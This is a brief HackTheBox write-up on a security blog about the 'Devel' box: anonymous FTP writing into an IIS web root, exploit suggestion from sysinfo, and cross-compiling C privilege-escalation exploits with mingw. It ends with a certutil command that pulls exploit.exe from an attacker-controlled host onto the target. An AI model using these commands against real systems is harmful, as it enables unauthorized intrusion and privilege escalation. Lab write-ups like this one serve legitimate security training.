IT-Security.top

Cyber Security Blog

CVE Enumeration Privilege Escalation Red Team

HackTheBox – Devel

By Marceli #afd.sys, #ctf, #devel, #hackthebox, #ms11-046

Devel is Windows 7 box with IIS server and anonymous access to FTP

welcome.png is on the main http page. This file is also visible in the ftp directory. Probably FTP service is opened in the directory of the web server.

I have copied output from sysinfo and used it with windows-exploit suggester below

Compiling C exploits on windows:

apt-get install gcc-mingw-w64-i686
apt-get install gcc-mingw-w64-i686
x64:
i686-w64-mingw32-gcc exploit.c -o exploit
x32:
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
certutil -urlcache -split -f http://10.10.14.3:8000/exploit.exe exploit.exe

Post Views: 807

By Marceli

Related Post

Injection Privilege Escalation Red Team

HackTheBox – CozyHosting

Marceli
Active Directory Red Team

HackTheBox – Active

Marceli
Active Directory Red Team

TryHackMe – Enumerating Active Directory

Marceli

Leave a Reply

Your email address will not be published. Required fields are marked *

You Missed

Injection Privilege Escalation Red Team

HackTheBox – CozyHosting

Resilient Organization

Next-Gen Firewall (NGFW) – selection & initial deployment

Active Directory Red Team

HackTheBox – Active

Active Directory Red Team

TryHackMe – Enumerating Active Directory